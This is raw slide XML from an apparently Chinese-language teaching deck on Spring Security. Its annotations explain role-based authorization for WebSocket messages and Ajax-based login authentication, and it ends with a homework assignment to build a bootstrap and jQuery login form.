              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’/topic/’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>前缀的订阅的消息都需要需要当前用户具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) 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295" y="2274866"/>
            <a:ext cx="5723809" cy="2752381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直接箭头连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8839199" y="1973912"/>
            <a:ext cx="566058" cy="899917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8665027" y="1712302"/>
            <a:ext cx="2452916" cy="26161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接受消息，并响应向订阅者发送消息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7295" y="5800543"/>
            <a:ext cx="2276190" cy="71428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4133" y="5800543"/>
            <a:ext cx="2123810" cy="676190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="直接箭头连接符 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6662057" y="3418607"/>
            <a:ext cx="569886" cy="2381936"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="60000"/>
              </a:srgb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endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8787923" y="3418607"/>
            <a:ext cx="1268115" cy="2381936"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="60000"/>
              </a:srgb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616230"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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53143" y="551543"/>
            <a:ext cx="4789714" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4789714" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="37011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dirty="0" err="1" smtClean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WebSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全整合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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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4</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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19" y="1821457"/>
            <a:ext cx="6546896" cy="1589401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接箭头连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6923315" y="2191657"/>
            <a:ext cx="783771" cy="61705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7707086" y="1976213"/>
            <a:ext cx="2844800" cy="43088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用户未登录前尝试连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器发送消息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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19" y="3940544"/>
            <a:ext cx="6546896" cy="1661970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接箭头连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3120571" y="3410858"/>
            <a:ext cx="2445" cy="529686"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF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V="1">
            <a:off x="3649867" y="3556000"/>
            <a:ext cx="631847" cy="384544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281714" y="3486662"/>
            <a:ext cx="1364342" cy="26161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出现认证失败异常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975055"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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53143" y="551543"/>
            <a:ext cx="4789714" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4789714" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="37011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dirty="0" err="1" smtClean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WebSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全整合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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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4</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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19" name="直接箭头连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6923315" y="2191657"/>
            <a:ext cx="783771" cy="61705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7707086" y="1976213"/>
            <a:ext cx="2844800" cy="60016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用户完成登录后并就具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebSocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器并发送消息成功。发送的消息显示在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>问候</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下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 flipH="1">
            <a:off x="3120571" y="3410858"/>
            <a:ext cx="2445" cy="529686"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF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V="1">
            <a:off x="3649867" y="3556000"/>
            <a:ext cx="631847" cy="384544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281714" y="3486662"/>
            <a:ext cx="1364342" cy="26161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日志显示认证通过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09" y="1934279"/>
            <a:ext cx="6413105" cy="14259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208" y="3991143"/>
            <a:ext cx="8735391" cy="262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2128"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931886" y="2786743"/>
            <a:ext cx="1567543" cy="1567543"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="56F2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902857" y="3207657"/>
            <a:ext cx="15530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目录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5936343" y="3207657"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="55000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6444343" y="1132114"/>
              <a:ext cx="4354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  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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44192AA8-6EE0-4E55-8A69-BE83B2761E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6398282" y="3154493"/>
            <a:ext cx="3430405" cy="138499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Ajax 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登录认证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8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8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CC1F883B-4400-4D47-A931-29527A2AD0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6978853" y="3684710"/>
            <a:ext cx="4400347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作业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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600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：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用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bootstrap +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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jquery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实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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ajax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方式的</a:t>
            </a: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Spring Security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登录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表单</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4143562711"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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758 0.00046 L 0.04453 2.22222E-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9" y="-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1784 0.00092 L -2.08333E-7 2.22222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" y="-4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758 0.00046 L 0.04453 2.22222E-6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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6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" y="-4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758 0.00046 L 0.04453 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="75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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="25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9" grpId="2"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="10" grpId="2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232" y="4033719"/>
            <a:ext cx="5726878" cy="267710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653143" y="551543"/>
            <a:ext cx="4078514" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4078514" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6662057" y="1121388"/>
              <a:ext cx="37011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dirty="0" smtClean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Ajax </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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登录认证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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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5</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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476" y="1661614"/>
            <a:ext cx="5212610" cy="224272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4232" y="1661615"/>
            <a:ext cx="5726878" cy="2242728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>
          <a:xfrm flipV="1">
            <a:off x="3171825" y="3390901"/>
            <a:ext cx="3400425" cy="199312"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="00B050">
                <a:alpha val="60000"/>
              </a:srgb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399" y="4992914"/>
            <a:ext cx="5152572" cy="1717906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5558971" y="3548382"/>
            <a:ext cx="1197203" cy="43088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指定登录成功后的处理跳转路径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381480" y="4382690"/>
            <a:ext cx="1311502" cy="43088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指定登录认证失败后的处理跳转路径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 flipV="1">
            <a:off x="2042432" y="2426602"/>
            <a:ext cx="4529818" cy="996065"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="00B050">
                <a:alpha val="60000"/>
              </a:srgb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4316809" y="2316713"/>
            <a:ext cx="1302771" cy="26161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指定登录页面路径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34" name="直接箭头连接符 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3171825" y="2578323"/>
            <a:ext cx="275546" cy="827911"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="00B050">
                <a:alpha val="60000"/>
              </a:srgb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2277295" y="2135398"/>
            <a:ext cx="1984008" cy="43088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指定登录处理路径由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>过滤器完成认证处理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40" name="直接箭头连接符 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1631391" y="4598133"/>
            <a:ext cx="631847" cy="384544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3733800" y="3713871"/>
            <a:ext cx="3022374" cy="1003050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="00B050">
                <a:alpha val="60000"/>
              </a:srgb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2271465" y="4394033"/>
            <a:ext cx="1311502" cy="43088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从上下文中获取用户认证信息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07617"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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53143" y="551543"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="54902"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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444343" y="1132114"/>
              <a:ext cx="4354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cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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1609821"/>
            <a:ext cx="5428571" cy="154285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839" y="3362228"/>
            <a:ext cx="4100662" cy="3181126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接箭头连接符 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5707971" y="2165805"/>
            <a:ext cx="523819" cy="45465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5782214" y="1742180"/>
            <a:ext cx="1311502" cy="43088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定义登录按钮点击事件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 flipV="1">
            <a:off x="4771800" y="4259532"/>
            <a:ext cx="783771" cy="61705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5555571" y="4044088"/>
            <a:ext cx="1311502" cy="60016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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方式提交登录表单。登录成功后进入欢迎页面。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9829" y="2381249"/>
            <a:ext cx="4152381" cy="4314286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="直接箭头连接符 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8353200" y="1957623"/>
            <a:ext cx="676500" cy="401615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9029700" y="1887391"/>
            <a:ext cx="1311502" cy="26161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校验登录表单信息。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030514" y="656931"/>
            <a:ext cx="3701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Ajax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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登录认证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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90328971"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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53143" y="551543"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="54902"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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444343" y="1132114"/>
              <a:ext cx="4354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cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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62" y="1662379"/>
            <a:ext cx="4252388" cy="235717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224" y="1662379"/>
            <a:ext cx="4894976" cy="235717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063" y="4498662"/>
            <a:ext cx="4252387" cy="207358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1224" y="4498662"/>
            <a:ext cx="5161676" cy="2073587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811010" y="2840964"/>
            <a:ext cx="1800214" cy="1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5021586" y="2194634"/>
            <a:ext cx="1311502" cy="43088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登录认证失败显示错误信息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2448810" y="4047009"/>
            <a:ext cx="8640" cy="45165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767806" y="4067775"/>
            <a:ext cx="1311502" cy="43088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登录认证成功显示成功信息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>
            <a:off x="4752318" y="5888312"/>
            <a:ext cx="1858906" cy="1718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5021586" y="5241981"/>
            <a:ext cx="1311502" cy="43088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点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>【OK】</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>按钮进入欢迎页面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030514" y="656931"/>
            <a:ext cx="3701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Ajax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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登录认证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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24961825"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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884397" y="1536509"/>
            <a:ext cx="4429384" cy="1935648"/>
            <a:chOff x="4036798" y="1948400"/>
            <a:chExt cx="4429384" cy="1935648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6798" y="1948400"/>
              <a:ext cx="4429384" cy="1935648"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5250836" y="2360857"/>
              <a:ext cx="2254582" cy="1015663"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:effectLst>
              <a:innerShdw blurRad="63500" dist="1752600">
                <a:prstClr val="black">
                  <a:alpha val="50000"/>
                </a:prstClr>
              </a:innerShdw>
            </a:effectLst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6000" b="1" spc="200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>2017</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A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3729537" y="3481908"/>
            <a:ext cx="480131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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>感谢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
